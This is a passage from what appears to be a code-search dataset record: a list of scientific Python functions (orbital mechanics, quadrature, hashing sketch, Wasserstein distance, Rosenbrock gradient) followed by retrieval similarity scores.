, MarkerSize = 10 , label = 'point a')\r\n plt.xlabel('a0 ')\r\n plt.ylabel(' a1 ')\r\n plt.legend()\r\n plt.xlim = (-1,1)\r\n plt.ylim = (-1,1)\r\n plt.title('p(a|x1,z1....xn,zn) for '+ str(len(x)) +' samples')\r\n plt.show() \r\n print('-x-x-x-x-x-x-x-x-x')\r\n\r\n return (mu,Cov)", "def v_p(self, psi_l, ci):\n\t\treturn min((ci*self.VPMAX0)/(ci + self.KP), self.VPR)", "def generate_good(self, m, n, rank, mu=2, ka=2):\n sr = random.random()\n s = []\n s.append(sr)\n for r in range(rank-1):\n newele = s[-1] * (1 + ka * random.random() / (rank-1))\n s.append(newele)\n s.reverse()\n \n # best_u = None\n # best_mu0 = 0\n # while best_mu0 == 0:\n # for _ in range(10):\n # A = np.random.rand(m,m)\n # A = scipy.linalg.orth(A)\n # u = A[:, :rank]\n # mu0 = self.compute_mu(u, m, rank)\n # print(\"mu0 : \", mu0)\n # if mu0 <= mu and mu0 >= best_mu0:\n # best_mu0 = mu0\n # best_u = u\n # print(\"mu0 for u:\", best_mu0)\n # # print(u.T @ u)\n \n # best_v = None\n # best_mu0 = 0\n # while best_mu0 == 0:\n # for _ in range(10):\n # B = np.random.rand(n,n)\n # B = scipy.linalg.orth(B)\n # v = B[:, :rank]\n # mu0 = self.compute_mu(v, n, rank)\n # print(\"mu0 : \", mu0)\n # if mu0 <= mu and mu0 >= best_mu0:\n # best_mu0 = mu0\n # best_v = v\n # print(\"mu0 for v:\", best_mu0)\n # u = best_u\n # v = best_v\n\n for _ in range(100):\n A = np.random.rand(m,m)\n A = scipy.linalg.orth(A)\n u = A[:, :rank]\n mu0 = self.compute_mu(u, m, rank)\n print(\"mu0 : \", mu0)\n if mu0 <= mu:\n break\n print(\"mu0 for u:\", mu0) \n\n for _ in range(10):\n B = np.random.rand(n,n)\n B = scipy.linalg.orth(B)\n v = B[:, :rank]\n mu0 = self.compute_mu(v, n, rank)\n print(\"mu0 : \", mu0)\n if mu0 <= mu:\n break\n print(\"mu0 for both:\", mu0)\n\n matrix = np.dot(u*s, v.T)\n \n kappa = s[0] / s[-1]\n print(\"kappa=\", kappa)\n \n ss = np.copy(s)\n for k in range(rank):\n ss[k] = s[k] / s[0]\n \n max_entry = np.max(np.abs(np.outer(u[:,:rank], v.T[:rank,:])))\n mu1 = max_entry * math.sqrt(m * n / rank)\n print(\"mu1=\", mu1)\n \n return matrix", "def calc_points_public(self):\n if self.cnt_public >= 2:\n nb_public_in_district = [0, 0, 0, 0, 0]\n i_to_district = (0, 0, 1, 2, 2, 0, 0, 1, 2, 2, 3, 3, 1, 4, 4, 3, 3, 1, 4, 4)\n for i in range(20):\n if self.b[i] == 'U':\n nb_public_in_district[i_to_district[i]] += 1\n districts = len([1 for x in nb_public_in_district if x > 0])\n vptab_public = (0, 2, 5, 9, 14, 20)\n points = vptab_public[districts] + self.cnt_public - len(args.exp) + self.cnt_public * ('hall' in 
args.exp)\n points += min(self.cnt_public - len(args.exp), 2)\n return points\n elif self.cnt_public == 1:\n points = 4 - 2 * len(args.exp) + ('hall' in args.exp)\n return points\n return 0", "def _r_inv(self):\n return self.sites.precisions", "def kepler_U_prv(mu, x , dt, ro, vro, inv_a, nMax=500):\n\n error = 1.0e-8\n n = 0\n ratio = 1\n while (abs(ratio) > error) and (n <= nMax) :\n n = n + 1\n z = x*x\n C = stump_C(inv_a*z)\n S = stump_S(inv_a*z)\n F = ro*vro/sqrt(mu)*z*C + (1 - inv_a*ro)*z*x*S + ro*x - sqrt(mu)*dt\n dFdx = ro*vro/sqrt(mu)*x*(1 - inv_a*z*S) + (1 - inv_a*ro)*z*C + ro\n ratio = F/dFdx\n x = x - ratio\n if n > nMax :\n return (False,x,ratio)\n else :\n return (True,x,ratio)", "def WaterVaporTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/828.5e-9,lp.c/828e-9]),sim_nu=np.array([])):\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n ext_wv = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(lp.mH2O*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True).T\n T_wv = np.exp(-np.cumsum(n_wv[np.newaxis,:]*ext_wv,axis=1)*dr)\n \n return T_wv,sim_nu", "def wind_ppa():\n per_kwh = 0.0384 # [$/kWh]\n\n return per_kwh", "def gaussp(y1, y2, n):\n\n # First check for trivial or stupid requests\n if n <= 0:\n raise ValueError(\"Zero (or less) grid points is stupid. Stop it.\")\n if n == 1:\n r = np.array([0.5*(y2 + y1)])\n wt = np.array([y2 - y1])\n return r, wt\n N_pi = 3.14159265358979323844 # Fortran uses stupid pi because of course it does\n EPS = 1e-14 # Desired accuracy\n n_sav = -1\n\n if n != n_sav:\n n_sav = n\n m = n\n m, r, wt = GridGenerator.gausspp(m)\n m = 0\n\n if m != n:\n m = int((n+1)/2) # Care, integer division\n x = np.zeros((2*m)) # Working r, not returned\n w = np.zeros((2*m)) # Working wt, not returned\n r = np.zeros((2*m))\n wt = np.zeros((2*m))\n for i in range(m):\n r[i] = N_pi*(i+0.75)/(n+0.5)\n r = np.cos(r)\n\n for i in range(m):\n z = r[i]\n z1 = 1e20 # Arbitrary large number to ensure at least 1 loop\n while abs(z-z1) > EPS:\n p1 = 1.0\n p2 = 0.0\n for j in range(n):\n p3 = p2\n p2 = p1\n p1 = ((2*(j + 1) - 1)*z*p2 - j*p3)/(j + 1)\n pp = n*(z*p1 - p2)/(z*z - 1.0)\n z1 = z\n z = z1 - p1/pp\n x[i] = -z\n x[n - (i + 1)] = z\n w[i] = 2.0/((1.0 - z*z)*pp*pp)\n w[n - (i + 1)] = w[i]\n\n for i in range(n):\n fact = 0.5*(y2-y1)\n r[i] = y1 + fact*(x[i] + 1.0)\n wt[i] = fact*w[i]\n\n return n, r, wt", "def weight(self):", "def dcweights(x):\n\n #Form the vanderMonde matrix:\n A=np.vander(x).T\n A=A[::-1,:]\n F=0*A\n n=snp.arange(len(x))+1\n for i in range(len(x)-1):\n a=x[i]; b=x[i+1]\n f=(b**n-a**n)/n\n F[:,i]=f\n w=snp.solve(A,F)\n\n return w[:,:-1]", "def get_whitener( A, k ):\n\n U, D, _ = svdk(A, k)\n Ds = sqrt(D)\n Di = 1./Ds\n return U.dot(diag(Di)), U.dot(diag(Ds))", "def genus(P, E, F, V=None):\n\n return euler_characteristic(P, E, F, V)-2", "def __init__(self, w=None, d=None, delta=None, epsilon=None, bits=256):\r\n\t\t\r\n\t\tif w is not None and d is not None:\r\n\t\t\tself.w = w\r\n\t\t\tself.d = d\r\n\t\telif delta is not None and epsilon is not None:\r\n\t\t\tself.w = int(ceil(e/epsilon))\r\n\t\t\tself.d = int(ceil(log(1./delta)))\r\n\t\t\tprint self.w, self.d\r\n\t\telse:\r\n\t\t\traise Exception(\"You must either supply both w and d or delta and epsilon.\")\r\n\t\t\r\n\t\tif 2**bits < w:\r\n\t\t\traise Exception(\"Too few bits for w\")\r\n\r\n\t\t#Values taken from http://www.isthe.com/chongo/tech/comp/fnv/\t\t\r\n\t\tif bits == 32:\r\n\t\t\tself.prime = 0x1000193\r\n\t\t\tself.offset = 0x811c9dc5\r\n\t\telif bits == 
64:\r\n\t\t\tself.prime = 0x100000001b3\r\n\t\t\tself.offset = 0xcbf29ce484222325L\r\n\t\telif bits == 128:\r\n\t\t\tself.prime = 0x1000000000000000000013bL\r\n\t\t\tself.offset = 0x6c62272e07bb014262b821756295c58dL\r\n\t\telif bits == 256:\r\n\t\t\tself.prime = 0x1000000000000000000000000000000000000000163L\r\n\t\t\tself.offset = 0xdd268dbcaac550362d98c384c4e576ccc8b1536847b6bbb31023b4c8caee0535L\r\n\t\telif bits == 512:\r\n\t\t\tself.prime = 0x100000000000000000000000000000000000000000000000000000000000000000000000000000000000157L\r\n\t\t\tself.offset = 0xb86db0b1171f4416dca1e50f309990acac87d059c90000000000000000000d21e948f68a34c192f62ea79bc942dbe7ce182036415f56e34bac982aac4afe9fd9L\r\n\t\telif bits == 1024:\r\n\t\t\tself.prime = 0x10000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000018dL\r\n\t\t\tself.offset = 0x5f7a76758ecc4d32e56d5a591028b74b29fc4223fdada16c3bf34eda3674da9a21d9000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c6d7eb6e73802734510a555f256cc005ae556bde8cc9c6a93b21aff4b16c71ee90b3L\r\n\t\telse:\r\n\t\t\traise Exception(\"Bits must be 32, 64, 128, 256, 512, or 1024\")\r\n\t\tself.L = self.w*(2**bits/self.w)\r\n\t\tself.mod = 2**bits-1\r\n\t\tself.bits = bits\r\n\t\tself.count = zeros((self.d, self.w), dtype=int32)\r\n\t\tself.rows = arange(self.d)\r\n\t\tself.shift_by = int(ceil(log(self.w, 2)))", "def unbalanced_Wasserstein_L1(mu,nu,x = None,alpha = 1):\n\n N = mu.size\n \n if x is None:\n x = np.linspace(0,1,N)\n\n dx = x[1]-x[0]\n\n mass_diff = np.sum((mu-nu) * dx) \n\n Integrand = np.abs( np.cumsum(mu-nu) - x * mass_diff )\n\n\n UW1 = np.sum(Integrand * dx) + (1/alpha)* np.abs( mass_diff )\n\n return UW1", "def rosen_der(x):\n xm = x[1:-1]\n xm_m1 = x[:-2]\n xm_p1 = x[2:]\n der = np.zeros_like(x)\n der[1:-1] = 200*(xm-xm_m1**2) - 400*(xm_p1 - xm**2)*xm - 2*(1-xm)\n der[0] = -400*x[0]*(x[1]-x[0]**2) - 2*(1-x[0])\n der[-1] = 200*(x[-1]-x[-2]**2)\n return der" ]
[ "0.61289203", "0.5875487", "0.58468914", "0.5686039", "0.56515056", "0.56493896", "0.5648032", "0.56267035", "0.5614728", "0.5562713", "0.5514241", "0.5454711", "0.5417939", "0.54137903", "0.53736", "0.53622884", "0.53448796", "0.5342925", "0.5333436", "0.53204405", "0.52887064", "0.52642024", "0.52560556", "0.52532494", "0.52346927", "0.52274686", "0.5227112", "0.52229697", "0.5221526", "0.5215328", "0.52027434", "0.5183674", "0.5173784", "0.5170593", "0.5170241", "0.5156524", "0.51563054", "0.51456636", "0.5145633", "0.5145349", "0.5136545", "0.5134752", "0.5128998", "0.5125624", "0.51236254", "0.5123321", "0.5123321", "0.5123252", "0.5122395", "0.5119689", "0.51148367", "0.5113817", "0.5113729", "0.5105356", "0.5104077", "0.5103753", "0.50928074", "0.5088988", "0.5088988", "0.5088988", "0.5088988", "0.5088988", "0.5088988", "0.50713205", "0.5068717", "0.5066665", "0.506224", "0.505925", "0.5057999", "0.50512135", "0.50511026", "0.504801", "0.50420356", "0.5035525", "0.5035484", "0.50261307", "0.5025521", "0.5015386", "0.5012752", "0.49914604", "0.49880427", "0.49859688", "0.49816287", "0.49771768", "0.49766853", "0.4976428", "0.49761584", "0.49754044", "0.49729025", "0.49708012", "0.49647433", "0.49615547", "0.49605072", "0.49575132", "0.49547657", "0.49516523", "0.49410483", "0.49406168", "0.4929739", "0.4924364", "0.4921875" ]
0.0
-1
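A minimal usage sketch for the `wvd` document function in the record above. It assumes `wvd` is importable together with SciPy and the module's own `signal_detrend` helper (called inside `wvd` but not included in this dump); the chirp test signal and its parameters are purely illustrative, not taken from the dataset.

```python
import numpy as np

# Illustrative input (assumption, not part of the dataset): a 1 s linear chirp
# sampled at 1000 Hz whose instantaneous frequency rises from 20 Hz to 100 Hz.
sampling_rate = 1000
t = np.arange(0, 1, 1 / sampling_rate)
test_signal = np.sin(2 * np.pi * (20 * t + 40 * t ** 2))

# Defaults from the record above: 256 frequency bins, analytic-signal conversion on.
frequency, time, tfr = wvd(test_signal, sampling_rate=sampling_rate, method="WignerVille")

print(frequency.shape)  # (256,)      frequency bins from 0 Hz up to ~Nyquist
print(tfr.shape)        # (256, 1000) one column of the distribution per input sample
```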
Smoothed Pseudo Wigner Ville Distribution
def smooth_pseudo_wvd(
    signal,
    sampling_rate=1000,
    freq_length=None,
    time_length=None,
    segment_step=1,
    nfreqbin=None,
    window_method="hamming",
):
    # Define parameters
    N = len(signal)
    # sample_spacing = 1 / sampling_rate
    if nfreqbin is None:
        nfreqbin = 300

    # Zero-padded signal to length 2N
    signal_padded = np.append(signal, np.zeros_like(signal))

    # DFT
    signal_fft = np.fft.fft(signal_padded)
    signal_fft[1 : N - 1] = signal_fft[1 : N - 1] * 2
    signal_fft[N:] = 0

    # Inverse FFT
    signal_ifft = np.fft.ifft(signal_fft)
    signal_ifft[N:] = 0

    # Make analytic signal
    signal = scipy.signal.hilbert(signal_detrend(signal_ifft))

    # Create smoothing windows in time and frequency
    if freq_length is None:
        freq_length = np.floor(N / 4.0)
        # Plus one if window length is not odd
        if freq_length % 2 == 0:
            freq_length += 1
    elif len(freq_length) % 2 == 0:
        raise ValueError("The length of frequency smoothing window must be odd.")

    if time_length is None:
        time_length = np.floor(N / 10.0)
        # Plus one if window length is not odd
        if time_length % 2 == 0:
            time_length += 1
    elif len(time_length) % 2 == 0:
        raise ValueError("The length of time smoothing window must be odd.")

    if window_method == "hamming":
        freq_window = scipy.signal.hamming(int(freq_length))  # normalize by max
        time_window = scipy.signal.hamming(int(time_length))  # normalize by max
    elif window_method == "gaussian":
        std_freq = freq_length / (6 * np.sqrt(2 * np.log(2)))
        freq_window = scipy.signal.gaussian(freq_length, std_freq)
        freq_window /= max(freq_window)
        std_time = time_length / (6 * np.sqrt(2 * np.log(2)))
        time_window = scipy.signal.gaussian(time_length, std_time)
        time_window /= max(time_window)
    # to add warning if method is not one of the supported methods

    # Mid-point index of windows
    midpt_freq = (len(freq_window) - 1) // 2
    midpt_time = (len(time_window) - 1) // 2

    # Create arrays
    time_array = np.arange(start=0, stop=N, step=segment_step, dtype=int) / sampling_rate
    # frequency_array = np.fft.fftfreq(nfreqbin, sample_spacing)[0:nfreqbin / 2]
    frequency_array = 0.5 * np.arange(nfreqbin, dtype=float) / N

    pwvd = np.zeros((nfreqbin, len(time_array)), dtype=complex)

    # Calculate pwvd
    for i, t in enumerate(time_array):
        # time shift
        tau_max = np.min(
            [t + midpt_time - 1, N - t + midpt_time, np.round(N / 2.0) - 1, midpt_freq]
        )
        # time-lag list
        tau = np.arange(
            start=-np.min([midpt_time, N - t]), stop=np.min([midpt_time, t - 1]) + 1, dtype="int"
        )
        time_pts = (midpt_time + tau).astype(int)
        g2 = time_window[time_pts]
        g2 = g2 / np.sum(g2)
        signal_pts = (t - tau - 1).astype(int)
        # zero frequency
        pwvd[0, i] = np.sum(g2 * signal[signal_pts] * np.conjugate(signal[signal_pts]))
        # other frequencies
        for m in range(int(tau_max)):
            tau = np.arange(
                start=-np.min([midpt_time, N - t - m]),
                stop=np.min([midpt_time, t - m - 1]) + 1,
                dtype="int",
            )
            time_pts = (midpt_time + tau).astype(int)
            g2 = time_window[time_pts]
            g2 = g2 / np.sum(g2)
            signal_pt1 = (t + m - tau - 1).astype(int)
            signal_pt2 = (t - m - tau - 1).astype(int)
            # compute positive half
            rmm = np.sum(g2 * signal[signal_pt1] * np.conjugate(signal[signal_pt2]))
            pwvd[m + 1, i] = freq_window[midpt_freq + m + 1] * rmm
            # compute negative half
            rmm = np.sum(g2 * signal[signal_pt2] * np.conjugate(signal[signal_pt1]))
            pwvd[nfreqbin - m - 1, i] = freq_window[midpt_freq - m + 1] * rmm

        m = np.round(N / 2.0)

        if t <= N - m and t >= m + 1 and m <= midpt_freq:
            tau = np.arange(
                start=-np.min([midpt_time, N - t - m]),
                stop=np.min([midpt_time, t - 1 - m]) + 1,
                dtype="int",
            )
            time_pts = (midpt_time + tau + 1).astype(int)
            g2 = time_window[time_pts]
            g2 = g2 / np.sum(g2)
            signal_pt1 = (t + m - tau).astype(int)
            signal_pt2 = (t - m - tau).astype(int)
            x = np.sum(g2 * signal[signal_pt1] * np.conjugate(signal[signal_pt2]))
            x *= freq_window[midpt_freq + m + 1]
            y = np.sum(g2 * signal[signal_pt2] * np.conjugate(signal[signal_pt1]))
            y *= freq_window[midpt_freq - m + 1]
            pwvd[m, i] = 0.5 * (x + y)

    pwvd = np.real(np.fft.fft(pwvd, axis=0))

    # Visualization

    return frequency_array, time_array, pwvd
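A minimal call sketch for the function above. The synthetic chirp, sampling rate, and parameter values are illustrative assumptions (not taken from the source), and the function's own dependencies (numpy, scipy.signal, and a signal_detrend helper from the same package) must be importable for it to run.

import numpy as np

# Hypothetical driver: a short linear chirp analysed with the function above.
sampling_rate = 500
t = np.arange(0, 2, 1 / sampling_rate)
chirp = np.sin(2 * np.pi * (5 + 10 * t) * t)

frequency_array, time_array, pwvd = smooth_pseudo_wvd(
    chirp,
    sampling_rate=sampling_rate,
    nfreqbin=200,
    window_method="hamming",
)
print(pwvd.shape)  # (nfreqbin, number of time steps)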
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _smooth(values, std):\n width = std * 4\n x = np.linspace(-width, width, min(2 * width + 1, len(values)))\n kernel = np.exp(-(x / 5)**2)\n\n values = np.array(values)\n weights = np.ones_like(values)\n\n smoothed_values = np.convolve(values, kernel, mode='same')\n smoothed_weights = np.convolve(weights, kernel, mode='same')\n\n return smoothed_values / smoothed_weights", "def smooth(self, xs, ys, x):\n w = np.sum(np.exp(np.multiply(np.square(np.divide(np.subtract(xs, x), self.sigma)), -0.5)))\n v = np.sum(np.multiply(ys, np.exp(np.multiply(np.square(np.divide(np.subtract(xs, x), self.sigma)), -0.5))))\n\n return v / w", "def smooth(inputdata, w, imax):\n data = 1.0*inputdata\n data = data.replace(np.nan, 1)\n data = data.replace(np.inf, 1)\n \n smoothed = 1.0*data\n normalization = 1\n for i in range(-imax, imax+1):\n if i==0:\n continue\n smoothed += (w**abs(i))*data.shift(i, axis=0)\n normalization += w**abs(i)\n smoothed /= normalization\n return smoothed", "def smooth_series(y,p = 6.25):\n cycle, trend = sm.tsa.filters.hpfilter(y, p)\n return trend", "def gauss_smoothing(engine, smoothed, R, d_k):\n code = CodeSegment(engine)\n def tf(k):\n k2 = sum(ki**2 for ki in k)\n wts = numpy.exp(-0.5*k2* R**2)\n return wts\n \n code.assign(x='d_k', y='tmp')\n code.transfer(complex='tmp', tf=tf)\n code.c2r(real=smoothed, complex='tmp')\n return code", "def test_linear_2d_merwe():\n\n\n def fx(x, dt):\n F = np.array([[1, dt, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, dt],\n [0, 0, 0, 1]], dtype=float)\n\n return np.dot(F, x)\n\n def hx(x):\n return np.array([x[0], x[2]])\n\n\n dt = 0.1\n points = MerweScaledSigmaPoints(4, .1, 2., -1)\n kf = UKF(dim_x=4, dim_z=2, dt=dt, fx=fx, hx=hx, points=points)\n\n\n kf.x = np.array([-1., 1., -1., 1])\n kf.P*=0.0001\n #kf.R *=0\n #kf.Q\n\n zs = []\n for i in range(20):\n z = np.array([i+randn()*0.1, i+randn()*0.1])\n zs.append(z)\n\n Ms, Ps = kf.batch_filter(zs)\n smooth_x, _, _ = kf.rts_smoother(Ms, Ps, dt=dt)\n\n if DO_PLOT:\n plt.figure()\n zs = np.asarray(zs)\n plt.plot(zs[:,0], marker='+')\n plt.plot(Ms[:,0], c='b')\n plt.plot(smooth_x[:,0], smooth_x[:,2], c='r')\n print(smooth_x)", "def scw_loss(phi, v, m):\n return max(0, phi * np.sqrt(v) - m)", "def fingauss_smoothing(engine, smoothed, R, d_k):\n code = CodeSegment(engine)\n def tf(k):\n k2 = sum(((2*kny/numpy.pi)*numpy.sin(ki*numpy.pi/(2*kny)))**2 for ki in k)\n wts = numpy.exp(-0.5*k2* R**2)\n return wts\n \n kny = numpy.pi*engine.pm.Nmesh[0]/engine.pm.BoxSize[0]\n code.assign(x='d_k', y='tmp')\n code.transfer(complex='tmp', tf=tf)\n code.c2r(real=smoothed, complex='tmp')\n return code", "def Psmooth(self, k):\n om = self.om\n ol = self.ol\n omz = self.cosmology.Om(self.z) # Omega matter at z\n olz = ol/np.square(self.cosmology.efunc(self.z)) # MBW Eqn 3.77\n g0 = 5/2*om/(np.power(om, 4/7) - ol + ((1+om/2)*(1+ol/70))) # Eqn 4.76\n gz = 5/2*omz/(np.power(omz, 4/7) - olz + ((1+omz/2)*(1+olz/70)))\n Dlin_ratio = gz / (1+self.z) / g0\n Psmooth = self.P0smooth * np.square(self.T0(k)) * \\\n np.power(k, self.ns) * np.square(Dlin_ratio)\n return Psmooth", "def test_linear_2d_merwe_column():\n\n\n def fx(x, dt):\n F = np.array([[1, dt, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, dt],\n [0, 0, 0, 1]], dtype=float)\n\n return np.dot(F, x)\n\n def hx(x):\n return np.array([x[0], x[2]])\n\n\n dt = 0.1\n points = MerweScaledSigmaPoints2(4, .1, 2., -1)\n kf = UKF2(dim_x=4, dim_z=2, dt=dt, fx=fx, hx=hx, points=points)\n\n\n kf.x = np.array([[-1., 1., -1., 1]]).T\n kf.P*=0.0001\n #kf.R *=0\n #kf.Q\n\n zs = []\n for i in 
range(20):\n z = np.array([[i+randn()*0.1],\n [i+randn()*0.1]])\n zs.append(z)\n\n Ms, Ps = kf.batch_filter(zs)\n smooth_x, _, _ = kf.rts_smoother(Ms, Ps, dt=dt)\n\n if DO_PLOT:\n plt.figure()\n zs = np.asarray(zs)\n plt.plot(zs[:,0], marker='+', c='b')\n plt.plot(Ms[:,0], c='b')\n plt.plot(smooth_x[:,0], smooth_x[:,2], c='r')\n print(smooth_x)", "def generate_stat(sample_size, sparsity = 0, amplitude = 0, sigma = 1):\n var = generate_variable(sample_size, sparsity, amplitude, sigma)\n y_obs = var[0]\n \n \"\"\" \n f is equal to -X(t,theta) and we will minimize f (max. X)\n \"\"\"\n def f(x):\n \"\"\" \n f(x)=-X(t,theta) where x[0]=t and x[1]=theta\n \"\"\"\n res = np.real(np.exp(-1j*x[1])*\\\n sum(y_obs[k+sample_size]*np.exp(1j*k*x[0]) \\\n for k in range(-sample_size,sample_size+1))) \n res = -res/np.sqrt(2*sample_size+1) \n return res\n \n def grad_f(x):\n \"\"\" \n gradient of f\n \"\"\"\n res1 = np.real(np.exp(-1j*x[1])*\\\n sum(1j*k*y_obs[k+sample_size]*np.exp(1j*k*x[0]) \\\n for k in range(-sample_size,sample_size+1)))\n res1 = -res1/np.sqrt(2*sample_size+1)\n \n res2 = np.real(np.exp(-1j*x[1])*\\\n sum(-1j*y_obs[k+sample_size]*np.exp(1j*k*x[0]) \\\n for k in range(-sample_size,sample_size+1)))\n res2 = -res2/np.sqrt(2*sample_size+1)\n return np.array([res1, res2])\n \n #% Minimizing f\n \n \"\"\" \n we minimize on [0, 2pi]^2\n \"\"\"\n bnds = ((0, 2*np.pi), (0, 2*np.pi))\n \n \"\"\" \n We begin by a greedy search of the initialization point over a grid of size 126^2\n the initialization point is init\n \"\"\"\n x = y = np.arange(0, 2*np.pi, 0.05)\n steps = 126\n X, Y = np.meshgrid(x, y)\n val = np.array([f([x,y]) for x,y in zip(np.ravel(X), np.ravel(Y))])\n init = np.argmin(val)\n x1 = init%steps\n x2 = (init-x1)/steps\n init = [x1*0.05, x2*0.05]\n \n \"\"\" \n we minimize f...\n \"\"\"\n result = sco.minimize(f, init, method=\"L-BFGS-B\",\\\n jac=grad_f, bounds=bnds, tol=1e-15)\n \n \"\"\" \n (t1,theta1) is the argmax of X(t, theta) and l1=$\\lambda_1$\n \"\"\"\n t1 = result.x[0]\n theta1 = result.x[1]\n l1 = -f([t1,theta1])\n \n \n \"\"\" \n Function g(x) is equal to (X(t1,theta1)-X(x))/(1-rho((t1,theta1)-x))\n \"\"\"\n def g(x):\n a0 = x[0]-t1\n a1 = x[1]-theta1\n N = 2*sample_size+1\n \n vec = np.array([a0,a1])\n r = np.linalg.norm(vec)\n \"\"\" \n the value for r=0 is set to l1 (note that r=0 corresponds to x=(t1,theta1))\n \"\"\" \n res = l1 \n \n if (0<r) & (r<0.00001):\n \"\"\" \n we look a values near (t1,theta1) for which an indetermination occurs\n \"\"\" \n alpha= np.arccos(np.clip(a0/np.sqrt(a0**2+a1**2), -1.0, 1.0))\n u0 = np.cos(alpha)\n u1 = np.sin(alpha)\n \"\"\" \n u0,u1 defines the direction (unit vector)\n \"\"\"\n denom = sum((k*np.cos(alpha)-np.sin(alpha))**2*\\\n (np.sinc((r*(k*np.cos(alpha)-np.sin(alpha)))/(2*np.pi)))**2\\\n for k in range(-sample_size,sample_size+1))/N\n \"\"\" \n denom computes the denominator\n \"\"\"\n \n# \"\"\" \n# We use simpson rule for the numerator\n# \"\"\"\n# h = np.linspace(0,1,500)\n# \n# b0 = t1 + h*a0\n# b1 = theta1 + h*a1\n# \n# value = (1-h)*(u0**2*\\\n# np.real(np.exp(-1j*b1)*sum(-k**2*y_obs[k+sample_size]*np.exp(1j*k*b0) \\\n# for k in range(-sample_size,sample_size+1)))\\\n# +2*u0*u1*\\\n# np.real(np.exp(-1j*b1)*sum(k*y_obs[k+sample_size]*np.exp(1j*k*b0) \\\n# for k in range(-sample_size,sample_size+1)))\\\n# +u1**2*\\\n# np.real(np.exp(-1j*b1)*sum((-1)*y_obs[k+sample_size]*np.exp(1j*k*b0) \\\n# for k in range(-sample_size,sample_size+1)))) \n# value = value/np.sqrt(N)\n# \n# num = sci.simps(value, h)\n \n \"\"\" \n we 
use a quadrature for the numerator\n \"\"\" \n fun_int = lambda w: (1-w)*(u0**2*\\\n np.real(np.exp(-1j*(theta1+w*a1))*\\\n sum(-k**2*y_obs[k+sample_size]*np.exp(1j*k*(t1+w*a0)) \\\n for k in range(-sample_size,sample_size+1)))\\\n +2*u0*u1*\\\n np.real(np.exp(-1j*(theta1+w*a1))*\\\n sum(k*y_obs[k+sample_size]*np.exp(1j*k*(t1+w*a0)) \\\n for k in range(-sample_size,sample_size+1)))\\\n +u1**2*\\\n np.real(np.exp(-1j*(theta1+w*a1))*\\\n sum((-1)*y_obs[k+sample_size]*np.exp(1j*k*(t1+w*a0)) \\\n for k in range(-sample_size,sample_size+1)))) \n \n num = np.mean(sci.quad(fun_int, 0, 1, epsabs=1e-15, epsrel=1e-15, limit=1000))\n \n res = -num/denom\n \n if (r>=0.00001):\n \"\"\" \n we look a values far (t1,theta1) for which there is no indetermination\n \"\"\" \n res = (l1+f(x))/(1-(np.cos(a1)*dirichlet(a0,N)/N))\n \n return res \n \"\"\" \n we minimize g on [0, 2pi]^2 an dwe llok for the initialization point\n \"\"\"\n val2 = np.array([g([x,y]) for x,y in zip(np.ravel(X), np.ravel(Y))])\n init2 = np.argmin(val2)\n x1 = init2%steps\n x2 = (init2-x1)/steps\n init2 = [x1*0.05, x2*0.05] \n result2 = sco.minimize(g, init2, method=\"L-BFGS-B\", bounds=bnds, tol=1e-15) \n \"\"\" \n argmin of g\n \"\"\"\n t2 = result2.x[0]\n theta2 = result2.x[1] \n \"\"\" \n value of lambda_2\n \"\"\"\n l21 = l1-result2.fun \n a0 = t2-t1\n a1 = theta2-theta1\n N = 2*sample_size+1\n l22 = l1-(l1+f([t2,theta2]))/(1-(np.cos(a1)*dirichlet(a0,N)/N))\n l2 = max(l21,l22)\n \"\"\" \n we compute the statistic\n \"\"\"\n alpha1 = (1/3)*sample_size*(sample_size+1)\n alpha2 = (1/np.sqrt(N))*\\\n sum((k**2-alpha1)*\\\n np.real(y_obs[k+sample_size]*np.exp(1j*(k*t1-theta1))) \\\n for k in range(-sample_size,sample_size+1))\n alpha3 = (1/np.sqrt(N))*sum(k*np.real(y_obs[k+sample_size]*\\\n np.exp(1j*(k*t1-theta1))) for k in range(-sample_size,sample_size+1)) \n stat = (sigma*(alpha1*l1+alpha2)*scs.norm.pdf(l1/sigma)+\\\n (alpha1*sigma**2-alpha3**2)*(1-scs.norm.cdf(l1/sigma)))/\\\n (sigma*(alpha1*l2+alpha2)*scs.norm.pdf(l2/sigma)+\\\n (alpha1*sigma**2-alpha3**2)*(1-scs.norm.cdf(l2/sigma))) \n \n return stat", "def _denoise_tv_chambolle_nd(image, weight=0.1, eps=2.e-4, n_iter_max=200,\n xp=None):\n\n ndim = image.ndim\n p = xp.zeros((image.ndim, ) + image.shape, dtype=image.dtype)\n g = xp.zeros_like(p)\n d = xp.zeros_like(image)\n i = 0\n slices_g = [slice(None), ] * (ndim + 1)\n slices_d = [slice(None), ] * ndim\n slices_p = [slice(None), ] * (ndim + 1)\n while i < n_iter_max:\n if i > 0:\n # d will be the (negative) divergence of p\n d = -p.sum(0)\n for ax in range(ndim):\n slices_d[ax] = slice(1, None)\n slices_p[ax+1] = slice(0, -1)\n slices_p[0] = ax\n d[tuple(slices_d)] += p[tuple(slices_p)]\n slices_d[ax] = slice(None)\n slices_p[ax+1] = slice(None)\n out = image + d\n E = (d * d).sum()\n else:\n out = image\n E = 0.\n\n # g stores the gradients of out along each axis\n # e.g. g[0] is the first order finite difference along axis 0\n for ax in range(ndim):\n slices_g[ax+1] = slice(0, -1)\n slices_g[0] = ax\n if xp == np:\n g[tuple(slices_g)] = xp.diff(out, axis=ax)\n else:\n g[tuple(slices_g)] = diff(out, axis=ax)\n slices_g[ax+1] = slice(None)\n\n norm = (g * g).sum(axis=0, keepdims=True)\n xp.sqrt(norm, out=norm)\n E += weight * norm.sum()\n tau = 1. 
